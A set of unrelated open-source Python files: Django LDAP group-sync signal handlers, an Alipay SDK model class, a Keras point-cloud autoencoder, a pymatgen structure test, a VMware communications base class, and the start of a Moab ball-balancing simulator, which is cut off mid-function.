@receiver(backend_group_member_added)
def add_member_to_internal_ldap_group(sender, group, user, **kwargs):
"""
Whenever a member is added to a group we need to sync the LDAP group.
"""
if group is not None and user is not None:
try:
internal_ldap = get_internal_ldap_connected()
internal_ldap.add_group_member(group.backend_pk, user.backend_pk)
finally:
try:
internal_ldap.disconnect()
except:
pass
@receiver(backend_group_member_removed)
def remove_member_from_internal_ldap_group(sender, group, user, **kwargs):
"""
Whenever a member is removed from a group we need to sync the LDAP group.
"""
if group is not None and user is not None:
try:
internal_ldap = get_internal_ldap_connected()
internal_ldap.remove_group_member(group.backend_pk, user.backend_pk)
finally:
try:
internal_ldap.disconnect()
except:
pass
@receiver(backend_group_created)
def create_on_internal_ldap(sender, group, **kwargs):
"""
    BackendGroup instances are used to represent external backend (e.g. LDAP) groups.
    If such a group is created, we should therefore create the group on the backend.
"""
if group is not None:
try:
internal_ldap = get_internal_ldap_connected()
created = internal_ldap.create_group(group.backend_id, group.backend_pk)
# FIXME: this is the first time we really know the ID/PK given by the backend.
# all other operations having used to old ones might not be valid anymore...
group.backend_id = created.get(GroupBackend.FIELD_ID)
group.backend_pk = created.get(GroupBackend.FIELD_PK)
group.save()
except GroupBackendError as ex:
group.delete() # XXX: cleanup?
raise ex
finally:
try:
internal_ldap.disconnect()
except:
pass
@receiver(backend_group_deleted)
def delete_django_group(sender, group, **kwargs):
"""
Delete the internal Django group on delete.
"""
if group is not None:
try:
group.django_group.delete()
except:
pass # already deleted?
@receiver(backend_group_deleted)
def delete_on_internal_ldap(sender, group, **kwargs):
"""
In case the BackendGroup record is deleted, we need to cleanup the internal LDAP server.
"""
if group is not None:
try:
internal_ldap = get_internal_ldap_connected()
internal_ldap.delete_group(group.backend_pk)
except GroupNotFoundError:
pass # already deleted
except GroupBackendError as ex:
# XXX: recreate?
raise ex
finally:
try:
internal_ldap.disconnect()
except:
pass
@receiver(post_delete, sender=BackendGroup)
def post_delete_handler(sender, instance, **kwargs):
"""
Method to map Django post_delete model signals to custom ones.
"""
backend_group_deleted.send(sender=sender, group=instance, kwargs=kwargs)
@receiver(post_save, sender=BackendGroup)
def post_save_handler(sender, instance, **kwargs):
"""
Method to map Django post_save model signals to custom ones.
"""
if 'created' in kwargs and kwargs.get('created'):
backend_group_created.send(sender=sender, group=instance, kwargs=kwargs)
else:
backend_group_modified.send(
sender=sender,
group=instance,
fields=kwargs.get('update_fields'),
kwargs=kwargs
)
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import json
from alipay.aop.api.constant.ParamConstants import *
class AccessProduceQrcode(object):
def __init__(self):
self._batch_id = None
self._core_url = None
self._produce_order_id = None
self._qrcode = None
@property
def batch_id(self):
return self._batch_id
@batch_id.setter
def batch_id(self, value):
self._batch_id = value
@property
def core_url(self):
return self._core_url
@core_url.setter
def core_url(self, value):
self._core_url = value
@property
def produce_order_id(self):
return self._produce_order_id
@produce_order_id.setter
def produce_order_id(self, value):
self._produce_order_id = value
@property
def qrcode(self):
return self._qrcode
@qrcode.setter
def qrcode(self, value):
self._qrcode = value
def to_alipay_dict(self):
params = dict()
if self.batch_id:
if hasattr(self.batch_id, 'to_alipay_dict'):
params['batch_id'] = self.batch_id.to_alipay_dict()
else:
params['batch_id'] = self.batch_id
if self.core_url:
if hasattr(self.core_url, 'to_alipay_dict'):
params['core_url'] = self.core_url.to_alipay_dict()
else:
params['core_url'] = self.core_url
if self.produce_order_id:
if hasattr(self.produce_order_id, 'to_alipay_dict'):
params['produce_order_id'] = self.produce_order_id.to_alipay_dict()
else:
params['produce_order_id'] = self.produce_order_id
if self.qrcode:
if hasattr(self.qrcode, 'to_alipay_dict'):
params['qrcode'] = self.qrcode.to_alipay_dict()
else:
params['qrcode'] = self.qrcode
return params
@staticmethod
def from_alipay_dict(d):
if not d:
return None
o = AccessProduceQrcode()
if 'batch_id' in d:
o.batch_id = d['batch_id']
if 'core_url' in d:
o.core_url = d['core_url']
if 'produce_order_id' in d:
o.produce_order_id = d['produce_order_id']
if 'qrcode' in d:
o.qrcode = d['qrcode']
return o
|
# -*- coding: utf-8 -*-
"""
Created on Sat Apr 25 10:01:16 2020
@author: eliphat
Copyright 2020 Shanghai Jiao Tong University
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import os
import random
import numpy
import tensorflow as tf
import keras.backend as K
import keras
import data_flower
import visualizations
DATASET = r"./point_cloud/train"
TESTSET = r"./point_cloud/test"
def cut_points(args, k=100): # Hard cut, BP will fail
points, probab = args
argsorted = tf.argsort(probab, direction='DESCENDING')
indices = tf.gather(argsorted, tf.range(k), axis=-1)
return [tf.gather(points, indices, axis=-2, batch_dims=1),
tf.gather(probab, indices, axis=-1, batch_dims=1)]
def cut_points_layer(k=100):
return keras.layers.Lambda(lambda x: cut_points(x, k))
def dense_block(x, size):
y = keras.layers.Dense(size)(x)
y_bn = keras.layers.BatchNormalization()(y)
y_a = keras.layers.ReLU()(y_bn)
return y_a
def mlp_block(x, *sizes):
for size in sizes:
x = dense_block(x, size)
return x
def repeat_global(args):
glo, target = args
return keras.layers.RepeatVector(K.shape(target)[-2])(glo)
def merge_global(args):
glo, loc = args
repeated = repeat_global([glo, loc])
merged = K.concatenate([loc, repeated])
return merged
def probab_merge(args):
points, prob = args
# points: k x 3
# prob: 32 x k
# out: 32 x 3
prob = K.expand_dims(prob) # 32 x k x 1
points = K.expand_dims(points, axis=-3) # 1 x k x 3
merge = prob * points # broadcast, 32 x k x 3
return K.sum(merge, axis=-2)
def vec_norm(x):
return K.sqrt(K.sum(K.square(x), axis=-1) + K.epsilon())
def encoder(n_out=32, point_dims=3):
x = keras.layers.Input([None, point_dims])
y1 = mlp_block(x, 64, 64)
y2 = mlp_block(y1, 64, 128, 1024)
y_p = keras.layers.GlobalMaxPool1D()(y2)
merged = keras.layers.Lambda(merge_global)([y_p, y1])
yf = mlp_block(merged, 512, 256, n_out) # k x 32
yf_p = keras.layers.Permute([2, 1])(yf) # 32 x k
yf_pa = keras.layers.Softmax()(yf_p)
# to merge with k x 3
yf_pts = keras.layers.Lambda(probab_merge)([x, yf_pa])
return keras.models.Model(inputs=x, outputs=[yf_pts, yf_pa])
def decoder(k=32, point_dims=3):
def _call(x):
y1 = mlp_block(x, 64, 64)
yc2 = mlp_block(y1, 64, 128, 1024)
yc_p = keras.layers.GlobalMaxPool1D()(yc2)
yc = mlp_block(yc_p, 512, 256, 40)
yc_a = keras.layers.Softmax(name='aux')(yc)
y1_r = keras.layers.Flatten()(y1)
y2 = mlp_block(y1_r, 256, 512)
yf = keras.layers.Dense(1024 * point_dims)(y2)
yf_r = keras.layers.Reshape([1024, point_dims], name='recon')(yf)
return yf_r, yc_a
return _call
def nearest_neighbour_loss(y_true, y_pred):
# y_true: k1 x 3
# y_pred: k2 x 3
y_true_rep = K.expand_dims(y_true, axis=-2) # k1 x 1 x 3
y_pred_rep = K.expand_dims(y_pred, axis=-3) # 1 x k2 x 3
# k1 x k2 x 3
y_delta = K.sum(K.square(y_pred_rep - y_true_rep), axis=-1)
# k1 x k2
y_nearest = K.min(y_delta, -2)
# k2
b_nearest = K.min(y_delta, -1)
# k1
return K.mean(y_nearest) + K.mean(b_nearest)
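# Note: the loss above is the symmetric Chamfer distance between point sets:
# CD(A, B) = mean_a min_b ||a - b||^2 + mean_b min_a ||a - b||^2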
def deviation_regularization(y_true, y_pred):
std = K.std(y_pred, axis=-2)
return K.mean(std)
def loss_fn(y_true, y_pred):
return nearest_neighbour_loss(y_true, y_pred)
def network(point_dims=3, return_enc=False):
x = keras.layers.Input([None, point_dims])
enc = encoder(8, point_dims)
y_enc, pa = enc(x)
dec = decoder(8, point_dims)
y_dec, y_lab = dec(y_enc)
if return_enc:
return enc, keras.models.Model(inputs=x, outputs=[y_dec, y_lab])
return keras.models.Model(inputs=x, outputs=[y_dec, y_lab])
def nor(a):
data = a
nmean = numpy.mean(data, axis=-2, keepdims=True)
nstd = numpy.std(data, axis=-2, keepdims=True)
nstd = numpy.mean(nstd, axis=-1, keepdims=True)
return (data - nmean) / nstd
def visual_test(reload=False):
global x_test, enc, model
if reload:
x_test, x_label = data_flower.all_h5(TESTSET, True, True)
x_test = x_test[numpy.equal(x_label, 0)[:, 0], :, :]
enc, model = network(return_enc=True)
model.load_weights("weights_acae.h5")
pick = random.choice(x_test)
pd = model.predict(numpy.array([pick]))[0][0]
global Mx
Mx = enc.predict(numpy.array([pick]))[1][0]
MpSort = numpy.argsort(Mx, axis=-1)
Mp = numpy.reshape(MpSort[:, -2:], [-1])
kp = enc.predict(numpy.array([pick]))[0][0]
visualizations.merge_pcd(pick[list(filter(lambda x: x not in Mp, range(2048)))], pick[Mp])
# visualizations.show_point_cloud_array(pick)
visualizations.show_point_cloud_array(pd)
# visualizations.show_point_cloud_array(kp)
def repeatability_test():
x_test = data_flower.all_h5(TESTSET, True)
enc, model = network(return_enc=True)
model.load_weights("weights_acae.h5")
kp, _ = enc.predict(x_test, verbose=1)
rand = numpy.random.normal(size=[3, 1])
rand_T = numpy.transpose(rand)
gemm = numpy.matmul
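    # The next line builds a Householder reflection, I - 2*v*v^T / (v^T*v): an
    # orthogonal matrix that rotates/reflects the test clouds at random, so the
    # keypoints of the transformed clouds can be compared against the originals.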
ortho = numpy.eye(3) - 2 * (gemm(rand, rand_T)) / (gemm(rand_T, rand))
x_test_r = numpy.dot(x_test, ortho)
kp_r, _ = enc.predict(x_test_r, verbose=1)
kp_r = numpy.expand_dims(kp_r, axis=-2) # k1 x 1 x 3
kp = numpy.expand_dims(kp, axis=-3) # 1 x k2 x 3
delta = numpy.sum(numpy.square(kp - kp_r), axis=-1)
nearest = numpy.min(delta, -2)
eq = numpy.less_equal(nearest, 0.05 ** 2)
print("Repeatability:", numpy.mean(eq))
def train():
x, xl = data_flower.all_h5(DATASET, True, True) # n x 2048 x 3
x_test, xl_test = data_flower.all_h5(TESTSET, True, True)
model = network()
model.compile(
optimizer=keras.optimizers.Adam(),
loss={"recon": loss_fn, "aux": "sparse_categorical_crossentropy"},
loss_weights={"recon": 0.85, "aux": 0.15},
metrics={"recon": deviation_regularization, "aux": "acc"}
)
clbk = [
keras.callbacks.CSVLogger("training_acae.csv"),
keras.callbacks.ModelCheckpoint("weights_acae.h5",
save_best_only=True,
save_weights_only=True)
]
model.fit(x=x, y=[x, xl], batch_size=64, epochs=50,
validation_data=(x_test, [x_test, xl_test]),
callbacks=clbk)
# visual_test(True)
|
# coding: utf-8
# Copyright (c) 2018-2019, Taku MURAKAMI. All rights reserved.
# Distributed under the terms of the BSD 3-clause License.
import logging
import pymatgen
from pymatgen.io.vasp.inputs import Poscar
import sys
import os
sys.path.insert(0, os.path.abspath(os.path.join(os.path.dirname(__file__), '..')))
from model.modelgenerator import ModelGenerator
"""
The test for modify_symmetrical() method.
"""
logger = logging.getLogger(__name__)
if __name__ == "__main__":
gen = ModelGenerator("inputs/cif/Al2O3_hR30_R-3c_167.cif", fmt="cif")
for i in range(10):
while True:
gen.modify_symmetrical(min=-0.05, max=0.05)
constrains = gen.check_constrains(alpha_min=89.9, alpha_max=90.1,
beta_min=89.9, beta_max=90.1,
gamma_min=119.9, gamma_max=120.1)
if constrains is True:
break
with open("outputs/symmetrical/POSCAR"+str(i).zfill(2), mode="w") as file:
file.writelines(str(Poscar(gen.get_struct())))
gen.reset_struct()
|
# -*- coding: utf-8 -*-
# ----------------------------------------------------------------------------#
# Copyright © 2015-2016 VMware, Inc. All Rights Reserved. #
# #
# Licensed under the BSD 2-Clause License (the “License”); you may not use #
# this file except in compliance with the License. #
# #
# The BSD 2-Clause License #
# #
# Redistribution and use in source and binary forms, with or without #
# modification, are permitted provided that the following conditions are met:#
# #
# - Redistributions of source code must retain the above copyright notice, #
# this list of conditions and the following disclaimer. #
# #
# - Redistributions in binary form must reproduce the above copyright #
# notice, this list of conditions and the following disclaimer in the #
# documentation and/or other materials provided with the distribution. #
# #
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"#
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE #
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE #
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE #
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR #
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF #
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS #
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN #
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) #
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF #
# THE POSSIBILITY OF SUCH DAMAGE. #
# ----------------------------------------------------------------------------#
from abc import ABCMeta, abstractmethod
class DCCComms:
"""
Abstract base class for all DCC communications.
"""
__metaclass__ = ABCMeta
# -----------------------------------------------------------------------
# If a specific DCCComms has parameters to establish connection, pass
# them to its constructor, not self._connect. Keep self._connect free of
# external arguments.
#
@abstractmethod
def __init__(self):
"""
Abstract init method for DCCComms (Data Center Component Communication Protocols).
This must take all necessary params to establish a connection and must call _connect().
"""
self._connect()
@abstractmethod
def _connect(self):
"""
Abstract method for protocol specific connection establishment implementation.
All sub-classes implementing this method MUST assign the established connection to the variable 'self.client'
(Eg:) self.client = MyProtocol(ip, port, credentials)
:return:
"""
pass
@abstractmethod
def _disconnect(self):
"""
Abstract method for protocol-specific disconnect implementation.
:return:
"""
pass
@abstractmethod
def send(self, message, msg_attr):
"""
Abstract method to send message over the established connection.
:param message: Message to be sent
:param msg_attr: MessagingAttributes object. Message oriented protocols require params like QoS, RoutingKey,
Topics, etc., Such parameters should be encapsulated into protocol specific objects.
Eg: MqttMessagingAttributes, AmqpMessagingAttributes
:return:
"""
pass
@abstractmethod
def receive(self, msg_attr):
"""
Abstract method to receive message from the DCC.
:param msg_attr: MessagingAttributes object. Message oriented protocols require params like QoS, RoutingKey,
Topics, Callbacks, etc., Such parameters should be encapsulated into protocol specific objects.
Eg: MqttMessagingAttributes, AmqpMessagingAttributes
:return:
"""
pass
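# Minimal illustrative subclass sketch (names below are hypothetical, not part of
# this package; shown only to make the abstract contract concrete):
#
# class LoopbackComms(DCCComms):
#     def __init__(self):
#         super(LoopbackComms, self).__init__()  # base __init__ calls _connect()
#     def _connect(self):
#         self.client = []  # stand-in for a real protocol client
#     def _disconnect(self):
#         self.client = None
#     def send(self, message, msg_attr):
#         self.client.append(message)
#     def receive(self, msg_attr):
#         return self.client.pop(0) if self.client else None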
|
"""
Simulator for the Moab plate+ball balancing device.
"""
__author__ = "Mike Estee"
__copyright__ = "Copyright 2020, Microsoft Corp."
# pyright: strict
import math
import random
from typing import Dict, Tuple, cast
import numpy as np
from pyrr import Quaternion, Vector3, matrix44, quaternion, ray, vector
from pyrr.geometric_tests import ray_intersect_plane
from pyrr.plane import create_from_position
# Some type aliases for clarity
Plane = np.ndarray
Ray = np.ndarray
DEFAULT_TIME_DELTA = 0.045 # s, 45ms
DEFAULT_GRAVITY = 9.81 # m/s^2, Earth: there's no place like it.
DEFAULT_BALL_RADIUS = 0.02 # m, Ping-Pong ball: 20mm
DEFAULT_BALL_SHELL = 0.0002 # m, Ping-Pong ball: 0.2mm
DEFAULT_BALL_MASS = 0.0027 # kg, Ping-Pong ball: 2.7g
DEFAULT_OBSTACLE_RADIUS = 0.0 # m, if radius is zero, obstacle is disabled
DEFAULT_OBSTACLE_X = 0.03 # m, arbitrarily chosen
DEFAULT_OBSTACLE_Y = 0.03 # m, arbitrarily chosen
DEFAULT_PLATE_RADIUS = 0.225 / 2.0 # m, Moab: 225mm dia
PLATE_ORIGIN_TO_SURFACE_OFFSET = (
0.009 # 9mm offset from plate rot origin to plate surface
)
# plate limits
PLATE_HEIGHT_MAX = 0.040 # m, Moab: 40mm
DEFAULT_PLATE_HEIGHT = PLATE_HEIGHT_MAX / 2.0
DEFAULT_PLATE_ANGLE_LIMIT = math.radians(44.0 * 0.5) # rad, 1/2 full range
DEFAULT_PLATE_Z_LIMIT = PLATE_HEIGHT_MAX / 2.0 # m, +/- limit from center Z pos
# default ball Z position
DEFAULT_BALL_Z_POSITION = (
DEFAULT_PLATE_HEIGHT + PLATE_ORIGIN_TO_SURFACE_OFFSET + DEFAULT_BALL_RADIUS
)
PLATE_MAX_Z_VELOCITY = 1.0 # m/s
PLATE_Z_ACCEL = 10.0 # m/s^2
# Moab measured velocity at 15deg in 3/60ths, or 300deg/s
DEFAULT_PLATE_MAX_ANGULAR_VELOCITY = (60.0 / 3.0) * math.radians(15) # rad/s
# Set acceleration to get the plate up to velocity in 1/100th of a sec
DEFAULT_PLATE_ANGULAR_ACCEL = (
100.0 / 1.0
) * DEFAULT_PLATE_MAX_ANGULAR_VELOCITY # rad/s^2
# useful constants
X_AXIS = np.array([1.0, 0.0, 0.0])
Y_AXIS = np.array([0.0, 1.0, 0.0])
Z_AXIS = np.array([0.0, 0.0, 1.0])
# Sensor Actuator Noises
DEFAULT_PLATE_NOISE = 0.0 # noise added to plate_theta_* (rad)
DEFAULT_BALL_NOISE = 0.0 # noise added to estimated_* ball location (m)
DEFAULT_JITTER = 0.0 # jitter added to step_time (s)
def clamp(val: float, min_val: float, max_val: float):
return min(max_val, max(min_val, val))
class MoabModel:
def __init__(self):
self.reset()
def reset(self):
"""
Resets the model to known default state.
        If further changes are applied after resetting, the caller should call:
model.update_plate(True)
model.update_ball(True)
"""
# general config
self.time_delta = DEFAULT_TIME_DELTA
self.jitter = DEFAULT_JITTER
self.step_time = self.time_delta
self.elapsed_time = 0.0
self.gravity = DEFAULT_GRAVITY
# plate config
self.plate_noise = DEFAULT_PLATE_NOISE
self.plate_radius = DEFAULT_PLATE_RADIUS
self.plate_theta_limit = DEFAULT_PLATE_ANGLE_LIMIT
self.plate_theta_vel_limit = DEFAULT_PLATE_MAX_ANGULAR_VELOCITY
self.plate_theta_acc = DEFAULT_PLATE_ANGULAR_ACCEL
self.plate_z_limit = DEFAULT_PLATE_Z_LIMIT
# ball config
self.ball_noise = DEFAULT_BALL_NOISE
self.ball_mass = DEFAULT_BALL_MASS
self.ball_radius = DEFAULT_BALL_RADIUS
self.ball_shell = DEFAULT_BALL_SHELL
# control input (unitless) [-1..1]
self.pitch = 0.0
self.roll = 0.0
self.height_z = 0.0
# plate state
self.plate_theta_x = 0.0
self.plate_theta_y = 0.0
self.plate = Vector3([0.0, 0.0, DEFAULT_PLATE_HEIGHT])
self.plate_theta_vel_x = 0.0
self.plate_theta_vel_y = 0.0
self.plate_vel_z = 0.0
# ball state
self.ball = Vector3([0.0, 0.0, DEFAULT_BALL_Z_POSITION])
self.ball_vel = Vector3([0.0, 0.0, 0.0])
self.ball_qat = Quaternion([0.0, 0.0, 0.0, 1.0])
self.ball_on_plate = Vector3(
[0.0, 0.0, PLATE_ORIGIN_TO_SURFACE_OFFSET + DEFAULT_BALL_RADIUS]
)
# current target
self.target_x = 0.0
self.target_y = 0.0
# current obstacle
self.obstacle_distance = 0.0
self.obstacle_direction = 0.0
self.obstacle_radius = 0.0
self.obstacle_x = 0.0
self.obstacle_y = 0.0
# camera observed estimated metrics
self.estimated_x = 0.0
self.estimated_y = 0.0
self.estimated_vel_x = 0.0
self.estimated_vel_y = 0.0
self.estimated_radius = self.ball_radius
# target relative polar coords/vel
self.estimated_speed = 0.0
self.estimated_direction = 0.0
self.estimated_distance = 0.0
self.prev_estimated_x = 0.0
self.prev_estimated_y = 0.0
# meta
self.iteration_count = 0
# now that the base state has been set, run an update
        # to make sure all variables are internally consistent
self.update_plate(True)
self.update_ball(True)
def halted(self) -> bool:
"""
Returns True if the ball is off the plate.
"""
# ball.z relative to plate
zpos = self.ball.z - (
self.plate.z + self.ball_radius + PLATE_ORIGIN_TO_SURFACE_OFFSET
)
# ball distance from ball position on plate at origin
distance_to_center = math.sqrt(
math.pow(self.ball.x, 2.0)
+ math.pow(self.ball.y, 2.0)
+ math.pow(zpos, 2.0)
)
return distance_to_center > self.plate_radius
def step(self):
"""
Single step the simulation.
The current actions will be applied, and the model evaluated.
All state variables will be updated.
"""
self.step_time = self.time_delta + MoabModel.random_noise(self.jitter)
self.elapsed_time += self.step_time
self.update_plate(False)
self.update_ball(False)
# update meta
self.iteration_count += 1
# returns a noise value in the range [-scalar .. scalar] with a gaussian distribution
@staticmethod
def random_noise(scalar: float) -> float:
return scalar * clamp(
random.gauss(mu=0, sigma=0.333), -1, 1
        )  # zero-mean gauss with sigma ~= scalar/3, clamped to [-scalar .. scalar]
@staticmethod
def accel_param(
q: float, dest: float, vel: float, acc: float, max_vel: float, delta_t: float
) -> Tuple[float, float]:
"""
perform a linear acceleration of variable towards a destination
with a hard stop at the destination. returns the position and velocity
after delta_t has elapsed.
q: initial position
dest: target destination
vel: current velocity
acc: acceleration constant
max_vel: maximum velocity
delta_t: time delta
returns: (final_position, final_velocity)
"""
        # direction of accel
        direction = 0.0
        if q < dest:
            direction = 1.0
        if q > dest:
            direction = -1.0
        # calculate the change in velocity and position
        acc = acc * direction * delta_t
        vel_end = clamp(vel + acc * delta_t, -max_vel, max_vel)
        vel_avg = (vel + vel_end) * 0.5
        delta = vel_avg * delta_t
        vel = vel_end
        # moving towards the dest?
        if (direction > 0 and q < dest and q + delta < dest) or (
            direction < 0 and q > dest and q + delta > dest
):
q = q + delta
# stop at dest
else:
q = dest
vel = 0
return (q, vel)
@staticmethod
def heading_to_point(
start_x: float,
start_y: float,
vel_x: float,
vel_y: float,
point_x: float,
point_y: float,
):
"""
Return a heading, in 2D RH coordinate system.
x,y: the current position of the object
vel_x, vel_y: the current velocity vector of motion for the object
point_x, point_y: the destination point to head towards
returns: offset angle in radians in the range [-pi .. pi]
where:
0.0: object is moving directly towards the point
[-pi .. <0]: object is moving to the "right" of the point
        [>0 .. pi]: object is moving to the "left" of the point
        -pi or pi: object is moving directly away from the point
"""
# vector to point
dx = point_x - start_x
dy = point_y - start_y
# if the ball is already at the target location or
# is not moving, return a heading of 0 so we don't
# attempt to normalize a zero-length vector
if dx == 0 and dy == 0:
return 0
if vel_x == 0 and vel_y == 0:
return 0
# vectors and lengths
u = vector.normalize([dx, dy, 0.0])
v = vector.normalize([vel_x, vel_y, 0.0])
ul = vector.length(u)
vl = vector.length(v)
# no velocity? already on the target?
angle = 0.0
if (ul != 0.0) and (vl != 0.0):
# angle between vectors
uv_dot = vector.dot(u, v)
# signed angle
x = u[0]
y = u[1]
angle = math.atan2(vector.dot([-y, x, 0.0], v), uv_dot)
if math.isnan(angle):
angle = 0.0
return angle
@staticmethod
def distance_to_point(x: float, y: float, point_x: float, point_y: float) -> float:
"""
Return the distance between two 2D points.
"""
dx = point_x - x
dy = point_y - y
return math.sqrt((dx ** 2.0) + (dy ** 2.0))
# convert X/Y theta components into a Z-Up RH plane normal
def _plate_nor(self) -> Vector3:
x_rot = matrix44.create_from_axis_rotation(
axis=X_AXIS, theta=self.plate_theta_x
)
y_rot = matrix44.create_from_axis_rotation(
axis=Y_AXIS, theta=self.plate_theta_y
)
# pitch then roll
nor = matrix44.apply_to_vector(mat=x_rot, vec=Z_AXIS)
nor = matrix44.apply_to_vector(mat=y_rot, vec=nor)
nor = vector.normalize(nor)
return Vector3(nor)
def update_plate(self, plate_reset: bool = False):
# Find the target xth,yth & zpos
# convert xy[-1..1] to zx[-self.plate_theta_limit .. self.plate_theta_limit]
# convert z[-1..1] to [PLATE_HEIGHT_MAX/2 - self.plate_z_limit .. PLATE_HEIGHT_MAX/2 + self.plate_z_limit]
theta_x_target = self.plate_theta_limit * self.pitch # pitch around X axis
theta_y_target = self.plate_theta_limit * self.roll # roll around Y axis
z_target = (self.height_z * self.plate_z_limit) + PLATE_HEIGHT_MAX / 2.0
# quantize target positions to whole degree increments
# the Moab hardware can only command by whole degrees
theta_y_target = math.radians(round(math.degrees(theta_y_target)))
theta_x_target = math.radians(round(math.degrees(theta_x_target)))
# get the current xth,yth & zpos
theta_x, theta_y = self.plate_theta_x, self.plate_theta_y
z_pos = self.plate.z
# on reset, bypass the motion equations
if plate_reset:
theta_x = theta_x_target
theta_y = theta_y_target
z_pos = z_target
# smooth transition to target based on accel and velocity limits
else:
theta_x, self.plate_theta_vel_x = MoabModel.accel_param(
theta_x,
theta_x_target,
self.plate_theta_vel_x,
self.plate_theta_acc,
self.plate_theta_vel_limit,
self.step_time,
)
theta_y, self.plate_theta_vel_y = MoabModel.accel_param(
theta_y,
theta_y_target,
self.plate_theta_vel_y,
self.plate_theta_acc,
self.plate_theta_vel_limit,
self.step_time,
)
z_pos, self.plate_vel_z = MoabModel.accel_param(
z_pos,
z_target,
self.plate_vel_z,
PLATE_Z_ACCEL,
PLATE_MAX_Z_VELOCITY,
self.step_time,
)
# add noise to the plate positions
theta_x += MoabModel.random_noise(self.plate_noise)
theta_y += MoabModel.random_noise(self.plate_noise)
# clamp to range limits
theta_x = clamp(theta_x, -self.plate_theta_limit, self.plate_theta_limit)
theta_y = clamp(theta_y, -self.plate_theta_limit, self.plate_theta_limit)
z_pos = clamp(
z_pos,
PLATE_HEIGHT_MAX / 2.0 - self.plate_z_limit,
PLATE_HEIGHT_MAX / 2.0 + self.plate_z_limit,
)
# Now convert back to plane parameters
self.plate_theta_x = theta_x
self.plate_theta_y = theta_y
self.plate.z = z_pos
    # ball inertia with radius and hollow radius
# I = 2/5 * m * ((r^5 - h^5) / (r^3 - h^3))
def _ball_inertia(self):
hollow_radius = self.ball_radius - self.ball_shell
return (
2.0
/ 5.0
* self.ball_mass
* (
(math.pow(self.ball_radius, 5.0) - math.pow(hollow_radius, 5.0))
/ (math.pow(self.ball_radius, 3.0) - math.pow(hollow_radius, 3.0))
)
)
def _camera_pos(self) -> Vector3:
""" camera origin (lens center) in world space """
return Vector3([0.0, 0.0, -0.052])
def _update_estimated_ball(self, ball: Vector3):
"""
Ray trace the ball position and an edge of the ball back to the camera
origin and use the collision points with the tilted plate to estimate
what a camera might perceive the ball position and size to be.
"""
# contact ray from camera to plate
camera = self._camera_pos()
displacement = camera - self.ball
displacement_radius = camera - (self.ball + Vector3([self.ball_radius, 0, 0]))
ball_ray = ray.create(camera, displacement)
ball_radius_ray = ray.create(camera, displacement_radius)
surface_plane = self._surface_plane()
contact = Vector3(ray_intersect_plane(ball_ray, surface_plane, False))
radius_contact = Vector3(
ray_intersect_plane(ball_radius_ray, surface_plane, False)
)
x, y = contact.x, contact.y
r = math.fabs(contact.x - radius_contact.x)
# add the noise in
self.estimated_x = x + MoabModel.random_noise(self.ball_noise)
self.estimated_y = y + MoabModel.random_noise(self.ball_noise)
self.estimated_radius = r + MoabModel.random_noise(self.ball_noise)
# Use n-1 states to calculate an estimated velocity.
self.estimated_vel_x = (
self.estimated_x - self.prev_estimated_x
) / self.step_time
self.estimated_vel_y = (
self.estimated_y - self.prev_estimated_y
) / self.step_time
# distance to target
self.estimated_distance = MoabModel.distance_to_point(
self.estimated_x, self.estimated_y, self.target_x, self.target_y
)
# update the derived states
self.estimated_speed = cast(float, vector.length(
[self.ball_vel.x, self.ball_vel.y, self.ball_vel.z]
))
self.estimated_direction = MoabModel.heading_to_point(
self.estimated_x,
self.estimated_y,
self.estimated_vel_x,
self.estimated_vel_y,
self.target_x,
self.target_y,
)
# update for next time
self.prev_estimated_x = self.estimated_x
self.prev_estimated_y = self.estimated_y
# update ball position in plate origin coordinates, and obstacle distance and direction
self.ball_on_plate = self.world_to_plate(self.ball.x, self.ball.y, self.ball.z)
self.obstacle_distance = self._get_obstacle_distance()
self.obstacle_direction = MoabModel.heading_to_point(
self.ball.x,
self.ball.y,
self.ball_vel.x,
self.ball_vel.y,
self.obstacle_x,
self.obstacle_y,
)
def _get_obstacle_distance(self) -> float:
# Ignore z value, calculate distance between obstacle and ball projection on plate
distance_between_centers = math.sqrt(
math.pow(self.ball_on_plate.x - self.obstacle_x, 2.0)
+ math.pow(self.ball_on_plate.y - self.obstacle_y, 2.0)
)
# Negative distance to obstacle means the ball and obstacle are overlapping
return distance_between_centers - self.ball_radius - self.obstacle_radius
def _surface_plane(self) -> Plane:
"""
Return the surface plane of the plate
"""
plate_surface = np.array(
[self.plate.x, self.plate.y, self.plate.z + PLATE_ORIGIN_TO_SURFACE_OFFSET]
)
return create_from_position(plate_surface, self._plate_nor())
def _motion_for_time(
self, u: Vector3, a: Vector3, t: float
) -> Tuple[Vector3, Vector3]:
"""
Equations of motion for displacement and final velocity
u: initial velocity
a: acceleration
d: displacement
v: final velocity
d = ut + 1/2at^2
v = u + at
returns (d, v)
"""
d = (u * t) + (0.5 * a * (t ** 2))
v = u + a * t
return d, v
def _update_ball_z(self):
self.ball.z = (
self.ball.x * math.sin(-self.plate_theta_y)
+ self.ball.y * math.sin(self.plate_theta_x)
+ self.ball_radius
+ self.plate.z
+ PLATE_ORIGIN_TO_SURFACE_OFFSET
)
def _ball_plate_contact(self, step_t: float) -> float:
# NOTE: the x_theta axis creates motion in the Y-axis, and vice versa
# x_theta, y_theta = self._xy_theta_from_nor(self.plate_nor.xyz)
x_theta = self.plate_theta_x
y_theta = self.plate_theta_y
# Equations for acceleration on a plate at rest
